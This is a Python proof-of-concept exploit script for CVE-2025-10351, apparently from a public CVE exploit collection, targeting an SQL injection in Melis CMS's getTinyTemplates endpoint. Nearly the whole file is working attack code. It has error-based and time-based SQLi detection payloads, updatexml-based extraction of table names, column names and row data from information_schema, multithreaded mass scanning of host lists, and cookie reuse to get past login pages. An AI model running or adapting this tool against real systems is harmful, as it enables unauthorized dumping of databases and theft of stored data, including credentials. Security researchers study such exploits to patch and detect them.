4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2025-10351-POC.py PY
#!/usr/bin/env python3
#===========================================================================================#
#         _______      ________    ___   ___ ___  _____      __  ___ ____  _____ __         #
#        / ____\ \    / /  ____|  |__ \ / _ \__ \| ____|    /_ |/ _ \___ \| ____/_ |        #
#       | |     \ \  / /| |__ ______ ) | | | | ) | |__ ______| | | | |__) | |__  | |        #
#       | |      \ \/ / |  __|______/ /| | | |/ /|___ \______| | | | |__ <|___ \ | |        #
#       | |____   \  /  | |____    / /_| |_| / /_ ___) |     | | |_| |__) |___) || |        #
#        \_____|   \/   |______|  |____|\___/____|____/      |_|\___/____/|____/ |_|        #
#                                                                                           #
#                                                                                           #
#      Made with love for the hacking community <3         Manuel Iván San Martín Castillo  #
#===========================================================================================#

import requests
import argparse
import html
import time
import urllib3
import concurrent.futures
from colorama import Fore, Style, init
from prettytable import PrettyTable
from urllib.parse import urlparse, urlsplit, parse_qs, urlunsplit
from bs4 import BeautifulSoup

# Disable SSL warnings for self-signed certs
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Initialize color output
init(autoreset=True)

# Toggle debug details for requests/responses in make_petition
DEBUG_REQ = False


def remove_html_tags(text):
    """Remove all HTML tags from a given string using BeautifulSoup."""
    return BeautifulSoup(text, "html.parser").get_text()


def is_time_based_sqli(session, url, payload_true, payload_false, sleep_time, threshold=0.9):
    """Check for time-based SQL injection by measuring response time differences using a session."""
    try:
        false_start = time.time()
        session.get(url + requests.utils.requote_uri(payload_false), timeout=sleep_time + 5)
        false_duration = time.time() - false_start

        true_start = time.time()
        session.get(url + requests.utils.requote_uri(payload_true), timeout=sleep_time + 5)
        true_duration = time.time() - true_start

        delay = true_duration - false_duration
        return delay >= (sleep_time * threshold)

    except requests.exceptions.Timeout:
        return True
    except Exception:
        return False


def check_endpoint(host, port, endpoint, cookie, proxy_str=None, disable_verify=False):
    """
    Main logic to check if a given endpoint is vulnerable to SQLi.
    Uses a requests.Session so cookie/headers persist across exploitation requests.
    proxy_str and disable_verify are passed so recursion keeps same settings.
    """
    base_url = f"{host}:{port}"
    endpoint_with_quote = endpoint.replace("=", "='")
    url_with_quote = f"{base_url}/{endpoint_with_quote}"

    try:
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
                          "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
        }
        cookies = {"PHPSESSID": cookie} if cookie else {}

        # Use a session to keep cookies and headers consistent across all requests
        session = requests.Session()
        session.headers.update(headers)
        if cookies:
            session.cookies.update(cookies)

        # Apply proxy and TLS behavior (explicit, no env)
        if proxy_str:
            session.proxies = {"http": proxy_str, "https": proxy_str}
            session.trust_env = False

        # session.verify respects disable_verify flag
        session.verify = False if disable_verify else True

        # initial check - follow redirects so we can spot login pages
        response = session.get(url_with_quote, allow_redirects=True, timeout=5)

        # Authentication required detection:
        # if there was a redirect to login, response.history will be non-empty or response.url will differ
        if not args.url_list and (response.history or (response.url and response.url != url_with_quote)):
            print(f"{base_url} {Fore.YELLOW}[AUTH REQUIRED]{Style.RESET_ALL}")
            new_cookie = ask_for_cookies()
            if new_cookie and len(new_cookie) >= 8:
                return check_endpoint(host, port, endpoint, new_cookie, proxy_str, disable_verify)
            elif new_cookie:
                print(f"{base_url} {Fore.BLUE}[INVALID COOKIE]{Style.RESET_ALL}")
            return

        # Error-based SQLi detection (look for MySQL error or xpath syntax error triggered by updatexml)
        if "You have an error in your SQL syntax" in response.text or "xpath" in response.text.lower():
            print(f"{base_url} {Fore.RED}[VULNERABLE]{Style.RESET_ALL} Error-Based SQLi")
            if args.all_tables or args.table:
                ask_to_exploit(f"{base_url}/{endpoint}", session)
        else:
            base = f"{base_url}/"

            # True delay payload (sleep happens)
            payload_true = endpoint.replace(
                "=",
                f"=1 AND (SELECT 1 FROM (SELECT(SLEEP({int(args.sleep)})))test)"
            )

            # False payload (no delay)
            payload_false = endpoint.replace(
                "=",
                "=1 AND (SELECT 1 FROM (SELECT(1))test)"
            )

            if is_time_based_sqli(session, base, payload_true, payload_false, args.sleep):
                print(f"{base_url} {Fore.RED}[VULNERABLE]{Style.RESET_ALL} Time-Based SQLi")
                print(f"{Fore.YELLOW}[!]{Style.RESET_ALL} WARNING: Time-Based exploitation is not supported.")
            else:
                print(f"{base_url} {Fore.GREEN}[NOT VULNERABLE]{Style.RESET_ALL}")

    except requests.exceptions.SSLError:
        print(f"{base_url} {Fore.YELLOW}[X]{Style.RESET_ALL} SSL Error")
    except requests.exceptions.ConnectionError:
        print(f"{base_url} {Fore.YELLOW}[X]{Style.RESET_ALL} Connection Error")
    except Exception as e:
        print(f"{base_url} {Fore.YELLOW}[X]{Style.RESET_ALL} General Error: {e}")


def process_url_list(file_path, endpoint, cookie, proxy_str=None, disable_verify=False):
    """Read URLs/hosts from a file and test each one individually (robust input + concurrency)."""
    try:
        seen = set()
        targets_all = []

        with open(file_path, 'r', encoding='utf-8', errors='ignore') as f:
            for line in f:
                line = line.strip()

                # Skip empties & comments
                if not line or line.startswith("#"):
                    continue

                targets = []

                # Case 1: full URL with scheme
                if "://" in line:
                    parsed = urlparse(line)
                    scheme = parsed.scheme.lower() if parsed.scheme else "http"
                    host = parsed.hostname
                    port = parsed.port if parsed.port else (443 if scheme == "https" else 80)

                    if not host:
                        continue

                    full_host = f"{scheme}://{host}"
                    targets.append((full_host, str(port)))

                else:
                    # Case 2/3: host, ip, host:port, ip:port (no scheme)
                    parsed = urlparse(f"//{line}")
                    host = parsed.hostname
                    port = parsed.port

                    if not host:
                        continue

                    if port:
                        tls_ports = {443, 8443, 9443, 10443}
                        scheme = "https" if port in tls_ports else "http"
                        targets.append((f"{scheme}://{host}", str(port)))
                    else:
                        targets.append((f"https://{host}", "443"))
                        targets.append((f"http://{host}", "80"))

                # Dedup + collect
                for full_host, port in targets:
                    key = (full_host, port)
                    if key in seen:
                        continue
                    seen.add(key)
                    targets_all.append((full_host, port))

        if not targets_all:
            print(f"[{Fore.YELLOW}!{Style.RESET_ALL}] URL list is empty or no valid targets found.")
            return

        # Concurrency (threads): simple and effective for I/O (requests)
        max_workers = 20  # sube/baja si quieres; 20 suele ir fino sin reventar nada
        with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as ex:
            futures = [
                ex.submit(check_endpoint, full_host, port, endpoint, cookie, proxy_str, disable_verify)
                for (full_host, port) in targets_all
            ]

            # Consume results to surface exceptions (if any)
            for fut in concurrent.futures.as_completed(futures):
                try:
                    fut.result()
                except Exception as e:
                    print(f"[{Fore.YELLOW}X{Style.RESET_ALL}] Worker error: {e}")

    except Exception as e:
        print(f"[{Fore.RED}ERROR{Style.RESET_ALL}] Failed to process URL list: {e}")



def ask_to_exploit(url, session):
    """Ask user if they want to exploit an identified SQLi vulnerability. Pass session so exploitation uses same cookies."""
    choice = input(f"[{Fore.MAGENTA}?{Style.RESET_ALL}] Do you want to attempt exploitation? (y/n): ").strip().lower()
    if choice in ('y', 'yes'):
        exploit_error_based(url, args.sleep, session)
    else:
        print(f"[{Fore.BLUE}X{Style.RESET_ALL}] Exploitation aborted.")


def ask_for_cookies():
    """Ask the user to input a PHPSESSID cookie value for rechecking."""
    choice = input(f"[{Fore.MAGENTA}?{Style.RESET_ALL}] Recheck with cookies? (y/n): ").strip().lower()
    if choice in ('y', 'yes'):
        return input(f"[{Fore.YELLOW}-{Style.RESET_ALL}] Enter PHPSESSID cookie: ").strip()
    return None

def make_petition(session, url, payload_template, sleep_time, output_file, data_type):
    """
    Robust petition with improved extraction reliability.
    Guarantees that even single results like '~changelog~' are printed.
    """
    if output_file and output_file.lower() != 'null':
        open(output_file, 'w').close()

    extracted_rows = []
    no_data_counter = 0

    parsed = urlsplit(url)
    param_name = None
    base_for_request = url
    if parsed.query:
        qs = parse_qs(parsed.query)
        if qs:
            param_name = list(qs.keys())[0]
            base_for_request = urlunsplit((parsed.scheme, parsed.netloc, parsed.path, '', ''))
    else:
        if '=' in url and url.rstrip().endswith('='):
            idx = url.rfind('=')
            last_part = url[:idx].split('/')[-1]
            param_name = last_part if last_part else 'id'
            base_for_request = url[:idx+1].rstrip('=')

    use_params = bool(param_name)

    for offset in range(0, 100):
        CHAIN = ""
        ITERATOR = 1
        ended = False
        data_fragment = ""

        while True:
            payload = payload_template.format(ITERATOR=ITERATOR, OFFSET=offset)
            try:
                if use_params:
                    params = {param_name: payload}
                    if DEBUG_REQ:
                        print(f"[DEBUG] GET {base_for_request} params={params}")
                    response = session.get(base_for_request, params=params, allow_redirects=False, timeout=3)
                else:
                    exploit_url = url + requests.utils.requote_uri(payload)
                    if DEBUG_REQ:
                        print(f"[DEBUG] GET {exploit_url}")
                    response = session.get(exploit_url, allow_redirects=True, timeout=3)

                if DEBUG_REQ:
                    print(f"[DEBUG] status={response.status_code} url={response.url}")
                    snippet = response.text[:800].replace("\n", "\\n")
                    print(f"[DEBUG] resp snippet: {snippet}")

                response_text = html.unescape(remove_html_tags(response.text))
                lines = response_text.splitlines()
                found_data = False

                for line in lines:
                    if "xpath" in line.lower():
                        # Detect data between ~ ~
                        if "~" in line:
                            extracted = line.split("~")
                            if len(extracted) > 1:
                                data_fragment = extracted[1].split("'")[0] if "'" in extracted[1] else extracted[1]
                        elif ":" in line:
                            data_fragment = line.split(":")[-1].strip()
                        else:
                            data_fragment = line.strip()

                        if data_fragment:
                            found_data = True
                            CHAIN += data_fragment
                            if DEBUG_REQ:
                                print(f"[DEBUG] extracted fragment: '{data_fragment}'")

                if found_data:
                    no_data_counter = 0
                else:
                    no_data_counter += 1

                if no_data_counter >= 5:
                    break

                ITERATOR += 31
                time.sleep(sleep_time)

            except requests.RequestException as e:
                if DEBUG_REQ:
                    print(f"[DEBUG] request exception: {e}")
                break

        # 🔧 NEW: ensure we don’t lose single results
        if not CHAIN and data_fragment:
            CHAIN = data_fragment

        if CHAIN:
            extracted_rows.append(CHAIN)
            print(f"[{Fore.GREEN}+{Style.RESET_ALL}] Extracted {data_type}: {Fore.BLUE}{CHAIN}{Style.RESET_ALL}")
            if output_file and output_file.lower() != 'null':
                with open(output_file, 'a') as f:
                    f.write(CHAIN + '\n')

    print(f"\n[{Fore.RED}X{Style.RESET_ALL}] Finished extraction process.\n")
    return extracted_rows

def display_table(data_list, columns, output_file):
    """Display extracted data in a nicely formatted table."""
    print(f"[{Fore.GREEN}+{Style.RESET_ALL}] Table with data")
    table = PrettyTable()
    table.field_names = columns

    for index, row in enumerate(data_list):
        row_data = row.split("||")
        if len(row_data) == len(columns):
            table.add_row(row_data)
            if index < len(data_list) - 1:
                table.add_divider()

    print(table)
    if output_file and output_file.lower() != 'null':
        with open(output_file, 'a') as f:
            f.write(str(table) + '\n')


def extract_tables(session, url, sleep_time, tables_filename):
    """Extract all table names in the current database."""
    payload_template = (
        "1 OR updatexml(null, concat(0x7e, "
        "(SELECT substring(table_name, {ITERATOR}, 32) "
        "FROM information_schema.tables WHERE table_schema=database() "
        "LIMIT 1 OFFSET {OFFSET}), 0x7e), null)"
    )
    make_petition(session, url, payload_template, sleep_time, tables_filename, 'table')


def extract_columns(session, url, sleep_time, table_name):
    """Extract all column names from a specific table."""
    print(f"{Fore.BLUE}i{Style.RESET_ALL} Extracting columns from table: {table_name}")
    payload_template = (
        f"1 OR updatexml(null, concat(0x7e, "
        f"(SELECT substring(column_name, {{ITERATOR}}, 32) "
        f"FROM information_schema.columns WHERE table_name='{table_name}' "
        f"LIMIT 1 OFFSET {{OFFSET}}), 0x7e), null)"
    )
    return make_petition(session, url, payload_template, sleep_time, 'null', 'column')


def extract_data_from_columns(session, url, sleep_time, table_name, columns):
    """Extract data from specified columns in a table."""
    parsed_url = urlparse(url)
    base_url = f"{parsed_url.scheme}://{parsed_url.netloc}"
    column_list = columns.split(',')
    columns_combined = ", 0x7c7c, ".join(column_list)

    payload_template = (
        f"1 OR updatexml(null, concat(0x7e, "
        f"(SELECT substring(concat({columns_combined}), {{ITERATOR}}, 32) "
        f"FROM {table_name} LIMIT 1 OFFSET {{OFFSET}}), 0x7e), null)"
    )
    print(f"{Fore.BLUE}i{Style.RESET_ALL} Extracting data from {base_url}")
    extracted_data = make_petition(session, url, payload_template, sleep_time, f"{table_name}_data.txt", 'data')

    if extracted_data:
        display_table(extracted_data, column_list, f"{table_name}_data.txt")


def exploit_error_based(url, sleep_time, session):
    """Main handler for exploiting via error-based SQL injection. Uses session passed from check_endpoint."""
    print(f"{Fore.BLUE}i{Style.RESET_ALL} Attempting Error-Based SQL Injection on {url}")
    print(f"{Fore.YELLOW}!{Style.RESET_ALL} WARNING: Large data may not extract properly")

    if args.all_tables:
        extract_tables(session, url, sleep_time, "tables_extracted.txt")
    elif args.table:
        if args.all_columns:
            columns = extract_columns(session, url, sleep_time, args.table)
            if columns:
                extract_data_from_columns(session, url, sleep_time, args.table, ",".join(columns))
        elif args.columns:
            extract_data_from_columns(session, url, sleep_time, args.table, args.columns)
        else:
            extract_columns(session, url, sleep_time, args.table)


if __name__ == "__main__":
    usage_message = "CVE-2025-10351.py -u <URL> -p <PORT> | -l <URL_LIST> [-s <SLEEP_TIME>] [-at] [-t <TABLE>] [-ac]"
    parser = argparse.ArgumentParser(usage=usage_message, add_help=False, description="Script to check and exploit CVE-2025-10351.")

    parser.add_argument("-u", "--url", help="Target URL (e.g. https://www.example.com)")
    parser.add_argument("-p", "--port", help="Port (e.g. 80, used only with --url)")
    parser.add_argument("-l", "--url-list", help="File with URLs to check (one per line)")
    parser.add_argument("-s", "--sleep", type=float, default=1.0, help="Sleep time (default: 1s)")
    parser.add_argument("-at", "--all-tables", action='store_true', help="Extract all tables.")
    parser.add_argument("-t", "--table", help="Specify a table name to extract columns.")
    parser.add_argument("-ac", "--all-columns", action='store_true', help="Extract all column data (requires -t).")
    parser.add_argument("-c", "--columns", help="Specify columns to extract (comma-separated).")
    parser.add_argument("--proxy", help="Proxy URL (no env). Example: http://127.0.0.1:8080")
    parser.add_argument("--insecure", action="store_true", help="Disable TLS verification (useful for intercepting HTTPS with Burp)")
    parser.add_argument("--cookie", help="PHPSESSID cookie (optional). Example: abc123")
    parser.add_argument("--debug", action="store_true", help="Enable verbose request/response debug for extraction")
    parser.add_argument("-h", "--help", action='help', default=argparse.SUPPRESS, help="Show help message.")

    args = parser.parse_args()

    # enable debug if requested
    if args.debug:
        DEBUG_REQ = True

    endpoint = "melis/MelisCms/PageEdition/getTinyTemplates?idPage="

    # Accept optional cookie via CLI
    cookie_arg = args.cookie or ""

    if args.url and args.port:
        check_endpoint(args.url, args.port, endpoint, cookie_arg, args.proxy, args.insecure)
    elif args.url_list:
        process_url_list(args.url_list, endpoint, cookie_arg, args.proxy, args.insecure)
    else:
        parser.print_help()